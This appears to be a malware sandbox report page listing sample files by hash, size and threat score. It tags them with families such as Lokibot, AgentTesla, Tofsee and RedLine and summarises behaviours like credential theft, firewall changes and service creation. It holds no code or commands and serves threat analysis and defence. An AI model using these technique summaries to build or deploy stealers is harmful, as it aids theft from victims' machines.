      190ffc93d1cf8112811d0568736905e6a943cc4787fb569754ed7e15ecd2efd7.apk

    • Size

      25.8MB

    • MD5

      eb89d696dd5f7922b4c49db6585a69a0

    • SHA1

      dc70bebb49ea7e0d85c45b206e4a557891e7e122

    • SHA256

      190ffc93d1cf8112811d0568736905e6a943cc4787fb569754ed7e15ecd2efd7

    • SHA512

      433df9feea2ee58701bf51d4db69925c0471b9361016a8a095a5bc76c2cff06834ad1dd5a1dea6d7e700c75ffea5108c472e6db2870184f69d9812d08b44c8cf

    • SSDEEP

      393216:/q1j7QtsfFZWOHhlFXRdTKosUBU+X8UPNwhgcCgBj8aCyiPJeq39YSpv:iB7Q+fVtGGBNCgeB4aCylM95pv

    Score
    3/10
    • Target

      1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1.vbs

    • Size

      554KB

    • MD5

      a4afe82ecf3940b8363d806604bc37a6

    • SHA1

      8d44d22cbe509b8f5662daf586e8de5446089ec9

    • SHA256

      1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1

    • SHA512

      be1817f80a514d1f7887a7a2b8f6e1364e3c14165effa26c3f12f95bdded410f81781246f36f2e0a7baa70682e513380b2fce5c4541bf9555594011013cf0649

    • SSDEEP

      12288:89OSGK7KzVkqo3CoMndRBwcm4MpPrNbbx9Od/UR1VY:eGKW6nMn7BiPpDZbAMfVY

    Score
    8/10
    • Blocklisted process makes network request

    • Target

      1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe

    • Size

      851KB

    • MD5

      84a4e8581550b0634e38d3218813ac79

    • SHA1

      1005f9154fb27c448ce8e39646b2da1fc010942e

    • SHA256

      1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d

    • SHA512

      0c924c0763f9bec6c7de3f303263436c8c63ff40682966feb04ffa54eb282aabe5d52a8d5dbffd417666f0a7d77d25eb24956a853616dfed24c79c278e9dd5a9

    • SSDEEP

      12288:y4xTxt9ivc50KsBNgK10IJkHKqZrDgSQlOnvgfEunph:3FivcRsBVBJyZX28n2

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

    • Lokibot family

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook profiles

    • Suspicious use of SetThreadContext

    • Target

      1b13d05cae0e4eac18dbaffe04a238238d6c2c2be285d825712cfbef91341326.exe

    • Size

      1.7MB

    • MD5

      f18a8734fe5484be1f784dd47178d6c6

    • SHA1

      abf12814aa5c4fd746e3b5a9635667a2c5ac0604

    • SHA256

      1b13d05cae0e4eac18dbaffe04a238238d6c2c2be285d825712cfbef91341326

    • SHA512

      f56646998a95a74bebd3174565ef01675f8c8ae9124f61598efbcfed60855e924accb4506da2f120bb9c9c59766fdc3de8f3dc79f5577ac0bd17ff9bf0d47f52

    • SSDEEP

      49152:H6VUMI6hKcPoV8bZLL9uj5a/Nxg+i/qA3gv:H688lLcj5Yg7/qegv

    Score
    7/10
    • Loads dropped DLL

    • Blocklisted process makes network request

    • Target

      1b9334e09c3df74ba3135169e49533c7a4d5a6c7ce090e31188e6f6a33403b52.exe

    • Size

      226KB

    • MD5

      19407c99f4b2baf3fcd8cc632ea60b97

    • SHA1

      b6574e349b99bd865c84e79a0ca596c5fdadcaf4

    • SHA256

      1b9334e09c3df74ba3135169e49533c7a4d5a6c7ce090e31188e6f6a33403b52

    • SHA512

      969235b95372f6df5980151c6fa75ad920cee8004a2a07df114c83aec2b1c83c9a7aa53903842dcd3cfed4cd683664643f1846089386c34733921a4e08edeba5

    • SSDEEP

      3072:EOS07dizsmBglaL0X+qa6eGR5d/Lhvw35WptqsVMn2jCV+btxEnogr:NSlDL0XXabGh/dwCnVM2jCVGtxEog

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c.exe

    • Size

      214KB

    • MD5

      da9914f2f681c7ef59293d3804c9133d

    • SHA1

      49d23c8eac05f7c8af203f0b46f7d805fc4b1724

    • SHA256

      1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c

    • SHA512

      3eaaf3ba1df0f3fef3141a3f2fb0e455620ffcf569dbe438d8a8a9fa2173c275897001f6ef52b18b138d5f88e9facc053f7e8a6751c655ee320842ee756f0615

    • SSDEEP

      6144:qweEpobsxm+SEfyjP4P3yYZcfrFPWHFjp:bowkAwfrFPWH

    Score
    7/10
    • Executes dropped EXE

    • Target

      1bd3fa491c5de8cb9189ff8f86fd1a7e27a8140e3578f8fa9ebb23931550cc5b.exe

    • Size

      447KB

    • MD5

      d93ae89b2dd80e754f282db2f968e537

    • SHA1

      52d0f0a4cc753daae727e5d79ae575f37042e6c2

    • SHA256

      1bd3fa491c5de8cb9189ff8f86fd1a7e27a8140e3578f8fa9ebb23931550cc5b

    • SHA512

      021879e0ad17ceab7fa3cd29e483da9e7ff6155f4e1e1a493517549d8d25f004f234f6d2caf74944bd4718e6e24c79a5139d4018018350bc7434fafa3230c806

    • SSDEEP

      6144:1HW9ZEjeXjYA2ospqAlwdVgDmETmGJE9i/pfp5thhhhYPDK2gIKb:mZ3XjYA2oXCRBuwpBrjYPDC

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

    • Agenttesla family

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

static1

miraiupxvmprotectlzrdratpyinstallerbrouteursthemidadefaultd1d6daf7a5018968dea23d67c142f047gafgytiratamiraipurecrypterdcratandrmonitoraurorarhadamanthyssocelarsstormkittysystembcxrednjratasyncratneshtaraccoonlaplassnakekeyloggererbium
Score
10/10

behavioral1

netwirebotnetdiscoveryexecutionratstealer
Score
10/10

behavioral2

execution
Score
10/10

behavioral3

formbookxloaderfofgdiscoveryloaderratspywarestealertrojan
Score
10/10

behavioral4

redlinediscoveryinfostealer
Score
10/10

behavioral5

gcleanerdiscoveryloader
Score
10/10

behavioral6

discoverypersistencevmprotect
Score
7/10

behavioral7

discovery
Score
7/10

behavioral8

tofseediscoveryevasionexecutionpersistenceprivilege_escalationtrojan
Score
10/10

behavioral9

redlinedozkeydiscoveryinfostealer
Score
10/10

behavioral10

smokeloaderpub4backdoordiscoverytrojan
Score
10/10

behavioral11

gcleanerdiscoveryloader
Score
10/10

behavioral12

redlinedozkeydiscoveryinfostealer
Score
10/10

behavioral13

gcleanerdiscoveryloader
Score
10/10

behavioral14

discovery
Score
3/10

behavioral15

tofseediscoveryevasionexecutionpersistenceprivilege_escalationtrojan
Score
10/10

behavioral16

formbooka20ediscoveryexecutionratspywarestealertrojan
Score
10/10

behavioral17

vidar1636discoverystealer
Score
10/10

behavioral18

smokeloaderpub4backdoordiscoverytrojan
Score
10/10

behavioral19

snakekeyloggercollectioncredential_accessdiscoveryexecutionkeyloggerspywarestealer
Score
10/10

behavioral20

Score
3/10

behavioral21

execution
Score
8/10

behavioral22

tofseediscoveryevasionexecutionpersistenceprivilege_escalationtrojan
Score
10/10

behavioral23

agentteslacollectioncredential_accessdiscoverykeyloggerpersistencespywarestealertrojan
Score
10/10

behavioral24

Score
10/10

behavioral25

Score
3/10

behavioral26

Score
3/10

behavioral27

discovery
Score
8/10

behavioral28

lokibotcollectiondiscoveryspywarestealertrojan
Score
10/10

behavioral29

discovery
Score
7/10

behavioral30

tofseediscoveryevasionexecutionpersistenceprivilege_escalationtrojan
Score
10/10

behavioral31

discovery
Score
7/10

behavioral32

agentteslacollectioncredential_accessdiscoverykeyloggerspywarestealertrojan
Score
10/10

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.